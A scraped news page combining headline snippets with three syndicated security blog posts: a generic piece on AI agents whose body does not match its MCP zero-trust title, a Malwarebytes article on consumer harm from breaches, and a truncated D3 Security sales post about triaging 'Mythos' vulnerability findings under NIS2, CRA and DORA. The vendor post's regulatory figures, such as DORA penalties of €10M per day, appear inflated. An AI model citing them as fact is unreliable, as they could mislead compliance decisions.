Technology

PLEASANTON, Calif., April 23, 2026 /PRNewswire/ -- PixerLens, Inc. announces a strategic partnership with Tata Consultancy Services (TCS) to jointly deliver advanced AI-powered solutions to enterpris… [+4345 chars]

Fairfax, Virginia, April 23, 2026 (GLOBE NEWSWIRE) -- The rise of generative artificial intelligence (GenAI) is transforming the global cybersecurity landscape, affecting how military operations, nat… [+5822 chars]

New Delhi: Finance Minister Nirmala Sitharaman on Thursday met heads of banks on risks related to Artificial Intelligence (AI) following global concerns over Anthropic's Mythos model threatening data… [+1667 chars]

<p>The post <a href="https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers">Zero Trust Architecture for Sidecar-Based MCP Servers</a> appeared first on <a href="https://www.gopher.security/blog">Read the Gopher Security's Quantum Safety Blog</a>.</p><h2>The shift toward embodied intelligence in business</h2><p>Ever wonder why most business AI feels like a really smart person trapped in a dark room just shouting answers? It's because we’ve mostly built "brains" that don't have "bodies" to actually do things in the real world. </p><p>When we talk about <strong>embodied intelligence</strong> here, we aren't necessarily talking about shiny metal robots. In a business context, "embodiment" means giving an AI agent digital agency—the ability to interact with and change its environment (like your CRM or cloud infra) rather than just processing text in a vacuum.</p><p>Basically, we are moving from static models—think of a chatbot that just sits there—to <strong>agents</strong> that actually interact with their environment. It’s the difference between reading a book about swimming and actually jumping into the pool to feel the water.</p><ul> <li><strong>Interaction over processing</strong>: Instead of just crunching data, these agents take an action, see what happens, and then adjust. It's a constant loop. </li> <li><strong>The feedback loop</strong>: In healthcare, an AI agent might help manage patient schedules by "feeling" out the urgency of requests rather than just following a rigid script.</li> <li><strong>Context is king</strong>: In retail, embodied intelligence means a system that doesn't just track inventory but predicts foot traffic by observing store layouts in real-time.</li> </ul><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-1.svg" alt="Diagram 1"></p><p>I've seen so many projects fail because they try to hard-code every single rule. (<a href="https://www.facebook.com/Danmartell/posts/fiverr-ceo-just-sent-his-employees-the-most-brutally-honest-email-ive-seen-from-/1283584809803653/">Fiverr CEO just sent his employees the most brutally honest email I …</a>) It never works because the business world is too messy. To solve this, we use <strong>evolutionary algorithms</strong>—a specific method where you let the system "evolve" its agentic behaviors through trial and error until it finds the most efficient workflow.</p><blockquote> <p>According to <a href="https://aiindex.stanford.edu/report/">Stanford University’s 2024 AI Index Report</a>, the shift toward "agentic" workflows is becoming the new standard for enterprise efficiency.</p> </blockquote><p>In finance, this looks like automated trading bots that don't just follow one strategy. They use those evolutionary methods to compete against each other in simulations, and only the "fittest" code survives to handle real money. It’s survival of the fittest, but for your tech stack.</p><p>Anyway, it's not just about being smart; it’s about being useful. Moving from "thinking" to "doing" is a huge leap for any CEO trying to actually see an ROI.</p><p>Next, we’re gonna dive into the actual "learning" part—how these things get smarter over time without you having to hold their hand.</p><h2>The lifecycle of an evolving AI agent</h2><p>Ever tried teaching a toddler how to use a spoon? It’s a mess of spilled cereal and weird experiments before they actually get it right, and honestly, evolving AI agents aren't much different. They need a safe place to fail where they won't accidentally delete your entire customer database or spend ten grand on ads for a product that doesn't exist yet.</p><p>You can't just throw an agent into the deep end on day one. We use "digital twins" or simulated environments—basically a video game version of your business—where the agent can try things out. If it’s a retail bot, we let it practice on a fake store with fake customers to see if it starts giving away too many discounts.</p><p>Debugging these things is a nightmare because they don't just have "bugs" in the traditional sense; they have "behaviors." When an agent makes a mistake, you have to look back at the training data and the feedback loop to see where it got the wrong idea. It's more like being a psychologist than a coder sometimes.</p><p>For the dev teams, this means moving to a continuous integration model that includes "evals." Every time you update the model, you run it through a battery of tests to make sure it hasn't lost its mind. Gartner mentioned how AI-augmented dev is speeding this up, but you still need a human in the loop to sign off on major changes.</p><p>Once your agent works, you probably want ten more of them, right? But scaling isn't just about copying and pasting code. You need load balancing so one agent doesn't get overwhelmed while the others sit around. If a healthcare agent is handling a spike in appointments, the system needs to spin up more "bodies" instantly.</p><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-3.svg" alt="Diagram 3"></p><p>Fault tolerance is huge here too. If one agent in a decentralized network crashes, the others need to pick up the slack without missing a beat. It’s about building a flexible architecture that doesn't break when one API call fails. </p><p>Anyway, the goal is to create a system that grows with your business, not one that you have to rebuild every six months. Next, we’re gonna look at the infrastructure you need to actually support these evolving agents.</p><h2>Building the infrastructure for evolving agents</h2><p>Building the "body" for an AI agent is honestly a lot harder than just training a model on some text. You can’t just give a brain a set of eyes and expect it to run a warehouse; you need the pipes, the wires, and the plumbing to make it all talk to each other without crashing.</p><p>If you’re trying to run next-gen agents on a tech stack from 2015, you’re gonna have a bad time. Most legacy systems are like old houses with bad wiring—they just can't handle the load of real-time AI processing. (<a href="https://acuvate.com/blog/legacy-factory-systems-fail-real-time-decisions/">Why Legacy Systems Fail Agentic AI &amp; Real-Time Decisions in 2026</a>) </p><p>Firms like <a href="https://technokeens.com/">Technokeens</a> are solving this "legacy bridge" problem by helping businesses with custom software development and cloud consulting. They specialize in application modernization, which is basically a fancy way of saying they take your old, clunky databases and bridge them to modern API structures so your agent isn't a genius who can't open the door to the room where the data is kept.</p><ul> <li><strong>Cloud-native is the only way</strong>: You need the elasticity of the cloud because agentic workloads spike like crazy when they start "thinking" through a problem.</li> <li><strong>API-first architecture</strong>: If your systems don't talk to each other via clean APIs, your agents will get stuck in silos.</li> <li><strong>Data liquidity</strong>: This isn't just about speed; it's about breaking down silos. Data liquidity means your agents can access cross-departmental info dynamically—like a retail agent seeing logistics delays and marketing budgets at the same time to adjust a promotion.</li> </ul><p>According to a 2023 report by <a href="https://www.gartner.com/en/newsroom/press-releases/2023-10-16-gartner-identifies-the-top-10-strategic-technology-trends-for-2024">Gartner</a>, nearly 25% of CIOs will be looking at "AI-augmented development" to speed up how they build this very infrastructure. </p><p>Once you have more than one agent, things get chaotic fast. It’s like having five interns who don't talk to each other but all have access to your corporate credit card. You need orchestration to make sure they aren't stepping on each others toes.</p><p>!Diagram 2</p><p>Monitoring is the other big piece. You can't just "set it and forget it" because agents can drift. You need dashboards that track not just if the agent is "up," but if it’s actually doing what it’s supposed to do.</p><p>Next, we’re gonna look at security—because giving an agent a body means giving it the power to break things.</p><h2>Security and Identity in the age of AI agents</h2><p>If you give an AI agent your corporate password and it goes rogue, who do you actually blame? It’s a weird question because we're used to securing people, not autonomous "bodies" that can make their own choices at 2 a.m. while we're asleep.</p><p>We can't just treat these agents like another employee with a login. We need a specialized identity and access management (IAM) strategy just for them.</p><ul> <li><strong>Identity for things, not people</strong>: Every agent needs a unique digital identity, almost like a service account but with way more guardrails. </li> <li><strong>RBAC vs ABAC</strong>: Most of us use Role-Based Access Control (RBAC), but for agents, Attribute-Based Access Control (ABAC) is better. For example, access is granted only if the agent's security clearance matches the data's sensitivity tag and the transaction originates from a verified IP.</li> <li><strong>Zero Trust is mandatory</strong>: You gotta assume the agent's API token could get leaked. Implementing zero trust means the agent has to prove its "identity" for every single request.</li> </ul><p>According to the Cybersecurity &amp; Infrastructure Security Agency (CISA), moving toward a zero trust architecture is the only way to handle the "expanding attack surface" created by automated systems. </p><p>Honestly, the scariest part of embodied intelligence is the "black box" problem. If a retail bot decides to discount every item in the store by 90%, you need an audit trail to see why it thought that was a good idea. </p><ul> <li><strong>Logging the "Why"</strong>: Traditional logs show <em>what</em> happened. AI logs need to show the reasoning—the "thought process" behind the action. </li> <li><strong>Compliance on autopilot</strong>: Tools can now automate GDPR and SOC2 compliance by watching agent behavior in real-time. </li> <li><strong>Ethical policies</strong>: You need hard-coded "off switches." In finance, this might be a circuit breaker that stops an agent if it loses a certain amount of money in under a minute.</li> </ul><blockquote> <p>A 2024 report by <a href="https://www.ibm.com/reports/threat-intelligence">IBM</a> highlights that the average cost of a data breach is hitting record highs, making the "security-first" approach for AI agents a business necessity.</p> </blockquote><p>Anyway, if you don't govern these things, they’ll eventually do something "smart" that is actually incredibly stupid for your bottom line. </p><h2>Real world impact and ROI</h2><p>So, we've spent all this time talking about how these agents "think" and "evolve," but let's be real—your boss only cares if it actually moves the needle on the bottom line. It’s easy to get lost in the tech, but the real magic happens when you see the ROI in places you didn't expect, like marketing or operations.</p><p>Measuring success isn't just about counting how many tickets a bot closed; it's about the quality of the "embodied" experience. </p><ul> <li><strong>KPIs that actually matter</strong>: Instead of just speed, look at "frustration scores." If a marketing agent notices a user hovering over a cancel button and offers a personalized discount in real-time, that's a retention win you can actually measure.</li> <li><strong>Resource optimization</strong>: It’s not about replacing people, it’s about shifting costs. If your AI handles the 80% of grunt work, your human team can focus on the 20% that requires actual creativity.</li> <li><strong>Personalization at scale</strong>: I've seen marketing teams use these agents to "feel out" customer sentiment across thousands of touchpoints, adjusting ad spend on the fly.</li> </ul><p>As mentioned earlier, the cost of data breaches is skyrocketing, so part of your ROI is actually "risk avoidance." You're spending money now to make sure you don't lose a fortune later when a dumb bot makes a huge mistake.</p><p><img decoding="async" src="https://cdn.pseo.one/6867c628b7f8c49dfe17648d/686ef5ab027b1d23f092b447/developing-embodied-intelligence-learning-evolution/mermaid-diagram-4.svg" alt="Diagram 4"></p><p>At the end of the day, we're finally giving the "brain in the dark room" a pair of hands and a way to see the world. By moving toward embodied intelligence, businesses stop just shouting answers and start actually solving problems in real-time. If you give these agents the right body, a secure identity, and a safe place to evolve, they stop being a science project and start being the most valuable employees you have. It’s a wild ride, but definitely one worth taking if you want to stay competitive in a world that doesn't slow down.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/zero-trust-architecture-for-sidecar-based-mcp-servers/" data-a2a-title="Zero Trust Architecture for Sidecar-Based MCP Servers"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fzero-trust-architecture-for-sidecar-based-mcp-servers%2F&amp;linkname=Zero%20Trust%20Architecture%20for%20Sidecar-Based%20MCP%20Servers" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fzero-trust-architecture-for-sidecar-based-mcp-servers%2F&amp;linkname=Zero%20Trust%20Architecture%20for%20Sidecar-Based%20MCP%20Servers" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fzero-trust-architecture-for-sidecar-based-mcp-servers%2F&amp;linkname=Zero%20Trust%20Architecture%20for%20Sidecar-Based%20MCP%20Servers" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fzero-trust-architecture-for-sidecar-based-mcp-servers%2F&amp;linkname=Zero%20Trust%20Architecture%20for%20Sidecar-Based%20MCP%20Servers" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fzero-trust-architecture-for-sidecar-based-mcp-servers%2F&amp;linkname=Zero%20Trust%20Architecture%20for%20Sidecar-Based%20MCP%20Servers" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.gopher.security/blog">Read the Gopher Security&amp;#039;s Quantum Safety Blog</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Read the Gopher Security's Quantum Safety Blog">Read the Gopher Security's Quantum Safety Blog</a>. Read the original post at: <a href="https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers">https://www.gopher.security/blog/zero-trust-architecture-sidecar-mcp-servers</a> </p>

<p>The post <a href="https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone">How cyberattacks on companies affect everyone</a> appeared first on <a href="https://www.malwarebytes.com/">Malwarebytes</a>.</p><p>If you use the internet, you’ve likely been affected by cybercrime in some way. Even when an attack is aimed at a company, the fallout usually lands on ordinary people.</p><p>The most obvious harm is stolen data. When attackers break into a business, it is usually customer information that ends up in criminal hands, and that can lead to <a href="https://www.malwarebytes.com/identity-theft" rel="noreferrer noopener">identity theft</a>, <a href="https://www.malwarebytes.com/blog/privacy/2026/03/your-tax-forms-sell-for-20-on-the-dark-web" rel="noreferrer noopener">tax fraud</a>, <a href="https://www.malwarebytes.com/press/2023/11/14/new-credit-card-skimmer-scam" rel="noreferrer noopener">credit card fraud</a>, and a long tail of scam attempts that can continue for months or years. For consumers, the breach itself is often just the start of the cleanup.</p><p>That work is annoying, time-consuming, and sometimes expensive. People may have to freeze credit, replace cards, change passwords, be on the lookout for suspicious transactions, and dispute charges. The Federal Trade Commission (FTC) specifically <a href="https://www.ftc.gov/media/79862" rel="noreferrer noopener nofollow">advises</a> consumers to use <a href="https://www.identitytheft.gov/databreach" rel="noreferrer noopener nofollow">IdentityTheft.gov</a> after a breach and recommends steps like credit freezes and fraud alerts to reduce the chance of further abuse.</p><p>When sensitive data is exposed, the harm is not only financial. Medical, insurance, and other deeply personal records can be used to create more convincing phishing or extortion attempts, and the stress of knowing that private information is circulating among criminals can linger long after the technical incident is over. In other words, breach victims are not just cleaning up a data problem, they are dealing with a loss of trust.</p><hr class="wp-block-separator has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" style="margin-top:var(--wp--preset--spacing--20);margin-bottom:var(--wp--preset--spacing--20)"><div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-28f84493 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow" style="flex-basis:15%"> <figure class="wp-block-image aligncenter size-large is-resized"><img decoding="async" src="https://www.malwarebytes.com/wp-content/uploads/sites/2/2024/11/phishing-scam-protection-icon-0B73D5.svg?w=1024" alt="" class="wp-image-120125" style="aspect-ratio:0.7764298093587522;width:65px;height:auto"></figure> </div> <div class="wp-block-column is-vertically-aligned-center is-layout-flow wp-container-core-column-is-layout-10073889 wp-block-column-is-layout-flow" style="padding-top:var(--wp--preset--spacing--30);padding-bottom:var(--wp--preset--spacing--30);flex-basis:60%"> <h3 class="wp-block-heading has-dark-blue-color has-text-color has-link-color wp-elements-d5cba6efaa6cef7ebba002e48b08f869" id="h-breaches-happen-every-day-don-t-be-the-last-to-know"><strong>Breaches happen every day.</strong> Don’t be the last to know.</h3> </div> <div class="wp-block-column is-vertically-aligned-center has-global-padding is-content-justification-right is-layout-constrained wp-container-core-column-is-layout-f1f2ed93 wp-block-column-is-layout-constrained" style="flex-basis:30%"> <div class="wp-block-malware-bytes-button mb-button" id="mb-button-a2b2e60f-b6c4-45fc-8aac-20ae3cf27e09"> <div class="mb-button__row u-justify-content-center"> <div class="mb-button__item mb-button-item-0"> <p class="btn-main"><a href="https://www.malwarebytes.com/identity-theft-protection" data-type="link" data-id="https://www.malwarebytes.com/scamguard" rel="noreferrer noopener">SEE PLANS</a></p> </div> </div> </div> </div> </div><hr class="wp-block-separator aligncenter has-text-color has-cyan-bluish-gray-color has-alpha-channel-opacity has-cyan-bluish-gray-background-color has-background is-style-wide" style="margin-top:var(--wp--preset--spacing--20);margin-bottom:var(--wp--preset--spacing--20)"><p>Cybercrime also hits consumers through service disruption. Ransomware and intrusion campaigns can interrupt payment systems, telecom services, shipping, energy distribution, booking platforms, and other infrastructure people rely on every day. In those cases, the consumer impact is immediate: you may not be able to pay, travel, call, buy, or even work normally. The <a href="https://www.csis.org/programs/strategic-technologies-program/significant-cyber-incidents">CSIS timeline</a> and <a href="https://www.cyber.gc.ca/en/guidance/national-cyber-threat-assessment-2025-2026">Canada’s cyberthreat assessment</a> both show that these disruptions are increasingly tied to high-value targets and can be part of broader state or criminal campaigns.</p><p>Not all these incidents are driven by cybercriminals. Recently, Britain’s cybersecurity chief warned that the <a href="https://therecord.media/UK-cyberattacks-ncsc-china" rel="noreferrer noopener nofollow">UK is handling 4 nationally significant cyberincidents every week</a>, with the majority now traced back to foreign governments rather than cybercriminal groups.</p><p>Another cost is easy to overlook: disinformation and confusion. When attackers steal data, disrupt services, or impersonate trusted brands, they can also flood the public with fake support messages, scam calls, refund schemes, and phishing emails pretending to be the breached company. The breach becomes a launchpad for more fraud, and consumers are left trying to separate legitimate notifications from those sent by attackers.</p><p>Then there is the security backlash. After a breach, companies usually tighten access rules, add more multi-factor authentication prompts, force reauthentication, shorten sessions, and increase fraud checks. Those measures are often necessary, but they also make ordinary digital life more cumbersome. The consumer ends up paying with time and frustration for security problems they did not create.</p><p>That is why company-targeted cybercrime is not really only a business problem. It is a consumer issue, a public-trust issue, and sometimes even a national security issue. A single breach can leak data, trigger fraud, interrupt essential services, amplify scams, and make using the internet more frustrating for everyone else. The real cost is rarely confined to the company that got hit.</p><p>Knowing this, it’s worth thinking carefully about which companies to trust with your data and how much you’re willing to share . You cannot stop every attack against every company you deal with, but you can limit the fallout by being more selective. Some considerations:</p><ul class="wp-block-list"> <li>Do they need all the information they are asking for?</li> <li>Would it hurt anything if you leave some fields blank or give less specific answers?</li> <li>Has this company been breached in the past, and how did they handle it?</li> <li>How long will they store the data you provide?</li> <li>Can you easily have your data removed at your request?</li> </ul><hr class="wp-block-separator has-alpha-channel-opacity is-style-wide"><p><strong>Your name, address, and phone number are probably already for sale. </strong> </p><p>Data brokers collect and sell your personal details to anyone willing to pay. Malwarebytes Personal Data Remover finds them and gets your information removed, then keeps watch so it stays that way.  </p><div class="wp-block-malware-bytes-button mb-button" id="mb-button-9fb76ce6-e9be-4800-a515-474eb985c2be"> <div class="mb-button__row u-justify-content-flex-start"> <div class="mb-button__item mb-button-item-0"> <p class="btn-main"><a href="https://www.malwarebytes.com/personal-data-remover"></a><a style="letter-spacing: -0.3px;display: inline !important" href="https://www.malwarebytes.com/personal-data-remover" rel="noreferrer noopener">SCAN NOW</a><a href="https://www.malwarebytes.com/personal-data-remover" rel="noreferrer noopener"></a></p> </div> </div> </div><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/04/how-cyberattacks-on-companies-affect-everyone/" data-a2a-title="How cyberattacks on companies affect everyone"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fhow-cyberattacks-on-companies-affect-everyone%2F&amp;linkname=How%20cyberattacks%20on%20companies%20affect%20everyone" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fhow-cyberattacks-on-companies-affect-everyone%2F&amp;linkname=How%20cyberattacks%20on%20companies%20affect%20everyone" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fhow-cyberattacks-on-companies-affect-everyone%2F&amp;linkname=How%20cyberattacks%20on%20companies%20affect%20everyone" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fhow-cyberattacks-on-companies-affect-everyone%2F&amp;linkname=How%20cyberattacks%20on%20companies%20affect%20everyone" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F04%2Fhow-cyberattacks-on-companies-affect-everyone%2F&amp;linkname=How%20cyberattacks%20on%20companies%20affect%20everyone" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.malwarebytes.com/">Malwarebytes</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Malwarebytes">Malwarebytes</a>. Read the original post at: <a href="https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone">https://www.malwarebytes.com/blog/privacy/2026/04/how-cyberattacks-on-companies-affect-everyone</a> </p>

<p>Mythos vulnerability findings are coming, thousands of them, all at once. When they arrive, your organization’s incident response clock starts immediately. If you’re subject to <a href="https://d3security.com/glossary/nis2-directive/" type="page" id="61361">NIS2</a>, <a href="https://d3security.com/glossary/mythos-nis2/" type="page" id="61444">CRA</a>, or <a href="https://d3security.com/glossary/dora-compliance/" type="page" id="59785">DORA</a> regulations, the compliance deadline is 24 hours, 4 hours, or, in the case of daily penalty accrual, effectively right now. A 10-analyst SOC can process roughly 320 findings in 24 hours. Mythos will likely generate far more than that in a single disclosure event. For EU-regulated organizations, this gap between Mythos scale and manual triage capacity is a compliance failure waiting to happen.</p><p>Every Mythos finding is a regulatory event. Organizations that attempt to manage Mythos findings using traditional vulnerability workflows will miss deadlines, trigger penalties, and expose leadership to personal liability. Regulators care about your response time.</p><p><a href="https://d3security.com/resources/mythos-whitepaper/" type="d3-resource" id="61458">Mythos</a> finds the zero-days. The real question is whether your organization can <em>classify, report, and act</em> on thousands of findings before the compliance deadline clock expires, for three separate regulatory frameworks simultaneously.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">The Regulatory Triple Threat</h2><p>For EU-regulated organizations, Mythos findings activate multiple compliance obligations in parallel:</p><h3 class="wp-block-heading">NIS2 (<a href="https://eur-lex.europa.eu/eli/dir/2022/2555" rel="noreferrer noopener">Directive 2022/2555</a>)</h3><ul class="wp-block-list"> <li>24-hour early warning to national authority for “significant incidents”</li> <li>72-hour assessment and full incident report</li> <li>€10M penalty cap (or 2% of global turnover, whichever is higher)</li> <li>Personal liability for board members and C-suite</li> </ul><h3 class="wp-block-heading"><a href="https://digital-strategy.ec.europa.eu/en/policies/cyber-resilience-act" rel="noreferrer noopener">CRA (Cyber Resilience Act</a>, effective 2025)</h3><ul class="wp-block-list"> <li>24-hour notification to <a href="https://www.enisa.europa.eu/" rel="noreferrer noopener">ENISA</a> for findings affecting products in scope</li> <li>Product remediation on an accelerated timeline</li> <li>€15M penalty for non-compliance</li> <li>Risk of product recall from EU markets</li> </ul><h3 class="wp-block-heading">DORA (<a href="https://eur-lex.europa.eu/eli/reg/2022/2554" rel="noreferrer noopener">Digital Operational Resilience Act</a>, effective 2025)</h3><ul class="wp-block-list"> <li>4-hour initial incident report to authorities</li> <li>Continues daily for active incidents</li> <li>Daily penalty accrual: up to €10M/day for large financial institutions</li> <li>Escalation triggers within hours (not days)</li> </ul><p>A single Mythos finding affecting a cloud service used by regulated organizations can activate all three frameworks simultaneously. Each has its own classification criteria, reporting timeline, and evidence requirements. Your compliance team may not even agree on which regulation takes priority.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">The Math That Breaks Manual Triage</h2><p>The arithmetic is straightforward. It’s also unforgiving.</p><p>A single Mythos disclosure event is expected to surface hundreds to thousands of novel vulnerabilities. Conservative estimates put the number at 500+ findings in a single batch. At 30 minutes per finding for proper triage, assessment, and initial reporting, a reasonable estimate for analyst-driven work, that’s 250 analyst-hours of effort.</p><p>A 10-person security team working an incident has <a href="https://d3security.com/resources/ai-alert-triage-siem-false-positives/" type="d3-resource" id="59893">capacity</a> for roughly:</p><ul class="wp-block-list"> <li>80 findings processed in 4 hours (DORA deadline)</li> <li>320 findings processed in 24 hours (NIS2 deadline)</li> </ul><p>Real-world triage speeds decline as incident workload increases. Context switching, stakeholder coordination, and regulatory documentation overhead further compress available time.</p><p><strong>The outcome:</strong> Organizations with typical SOC capacity will miss DORA deadlines 84% of the time and NIS2 deadlines 36% of the time.</p><p>Under DORA’s penalty framework, a €1B-turnover financial organization incurs €10M/day for every day the initial incident remains unclassified. For a 500-finding event processed at human speed, that penalty can exceed €50M before the backlog clears.</p><p>Manual triage is financially insolvent.</p><p>And Mythos won’t be the only source. OpenAI’s <a href="https://openai.com/index/codex-security-now-in-research-preview/" rel="noreferrer noopener">Codex Security</a> launched in March 2026, scanning 1.2 million commits in 30 days and surfacing over 10,000 high-severity findings. Each AI-discovered vulnerability triggers the same NIS2, CRA, and DORA reporting obligations. The compliance math only gets worse. Dedicated analysis of Codex Security’s regulatory impact is forthcoming.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">Why This Is Different From Standard Vulnerability Management</h2><p>Your organization already has a vulnerability management program. That program exists to handle CVEs, pre-published, catalogued, and arriving in a measured cadence. Mythos findings break that model.</p><p>EU regulatory frameworks were designed for human-speed disclosure cycles. A vendor publishes a CVE. Your team reads the advisory. Your team checks if you’re affected. You patch or mitigate. The regulatory clock is generous because disclosure has guardrails.</p><p>Mythos findings arrive without guardrails. They’re also richer than CVEs. Each finding includes code-level analysis, verified exploitation steps, contextual severity assessment, and affected version ranges. They’re actionable proof of concept that your systems are vulnerable.</p><p>More critically, the regulatory overlap creates parallel reporting chains. A finding affecting your in-house cloud platform may trigger:</p><ul class="wp-block-list"> <li>An NIS2 “significant incident” classification (requires authority notification)</li> <li>A CRA product recall assessment (requires ENISA notification)</li> <li>A DORA incident report (requires financial regulator notification)</li> </ul><p>Each classification follows different criteria. Each requires separate evidence chains. Each has its own timeline.</p><p>Traditional vulnerability management tools classify based on CVSS score. Regulators classify based on business impact, scope of exposure, and regulatory jurisdiction. The two taxonomies don’t align. Manual work is required to bridge the gap.</p><p>At scale, that work becomes impossible in the time available.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">How Morpheus AI Closes the Compliance Gap</h2><p>Morpheus AI is built to process vulnerability findings at analyst depth, across multiple findings, in parallel, without human bottlenecks.</p><p><strong>Processes 100% of Mythos findings at <a href="https://d3security.com/morpheus/triage/" type="page" id="54737">L2+ analyst depth</a>.</strong> Morpheus ingests raw finding data and executes the same analysis your most experienced analysts perform: asset identification, business context lookup, exploit validation, scope assessment, and regulatory classification. It processes hundreds of findings simultaneously while your team focuses on decision-making and response execution.</p><p><strong>Auto-classifies against NIS2/CRA/DORA criteria in a single pass.</strong> Each finding is assessed against the classification criteria for all three frameworks. Morpheus determines whether each finding qualifies as a “significant incident” under NIS2, triggers CRA notification obligations, or requires DORA reporting. The output is a structured classification that maps to your regulatory reporting workflows.</p><p><strong><a href="https://d3security.com/resources/contextual-playbook-generation/" type="d3-resource" id="59300">Contextual playbook generation</a> produces regulation-specific reports.</strong> Morpheus generates findings summaries tailored to each regulatory audience. The NIS2 report includes business impact and authority-facing language. The CRA report emphasizes product scope and remediation timeline. The DORA report prioritizes timeline and escalation criteria. The same underlying finding produces three regulatory reports without duplication of effort.</p><p><strong><a href="https://d3security.com/morpheus/investigation/" type="page" id="54727">Attack path discovery</a> determines impact scope for all three frameworks.</strong> Mythos findings identify vulnerabilities. Morpheus maps the attack paths those vulnerabilities enable. It determines whether exposure is customer-facing, internal-only, or requires chain exploitation. That impact scope determines regulatory classification and penalty risk.</p><p><strong>800+ <a href="https://d3security.com/morpheus/self-healing-integrations/" type="page" id="58808">self-healing integrations</a> connect to CSIRT/ENISA submission systems.</strong> Once Morpheus classifies a finding and generates the required report, it submits findings to national authorities, ENISA, and financial regulators through existing submission APIs. The human team receives a summary and escalation points, not a to-do list.</p><p><strong><a href="https://d3security.com/resources/dora-compliance-on-autopilot/" type="d3-resource" id="59293">Full audit trail</a> serves as evidence chain for regulators.</strong> Regulatory investigations examine your incident response decisions. Morpheus maintains a timestamped, immutable record of classification decisions, report generation, and submission timing. That record demonstrates compliance with regulatory timelines and decision quality.</p><hr class="wp-block-separator has-alpha-channel-opacity"><h2 class="wp-block-heading">A Readiness Framework for EU-Regulated Organizations</h2><p>Preparing for Mythos disclosure requires moving beyond traditional vulnerability management. Here’s a phased approach to compliance readiness:</p><h3 class="wp-block-heading">Phase 1: Assess</h3><ul class="wp-block-list"> <li>Map which regulations apply to your organization and products</li> <li>Audit current SOC capacity and triage timelines</li> <li>Identify gaps between current response speed and regulatory deadlines</li> <li>Catalog critical assets and their regulatory scope</li> </ul><h3 class="wp-block-heading">Phase 2: Deploy</h3><ul class="wp-block-list"> <li>Activate <a href="https://d3security.com/ai-soc-platform/" type="page" id="60708">Morpheus AI</a> with NIS2, CRA, and DORA compliance playbooks</li> <li>Configure connections to regulatory submission systems</li> <li>Establish stakeholder workflows for findings that require business decision-making</li> <li>Test compliance reporting with simulated vulnerability scenarios</li> </ul><h3 class="wp-block-heading">Phase 3: Validate</h3><ul class="wp-block-list"> <li>Execute tabletop exercises using realistic Mythos-scale scenarios</li> <li>Verify that regulatory reporting completes within required timelines</li> <li>Audit evidence trails and documentation quality</li> <li>Refine playbooks based on test results</li> </ul><p>Organizations that complete this framework before Mythos arrives will meet compliance deadlines. Organizations that don’t won’t.</p><hr class="wp-block-separator has-alpha-channel-opacity"><blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow"> <p><strong>Pre-Release Advisory:</strong> Mythos has not yet reached general availability. Morpheus AI currently processes vulnerability reports from production scanners. The 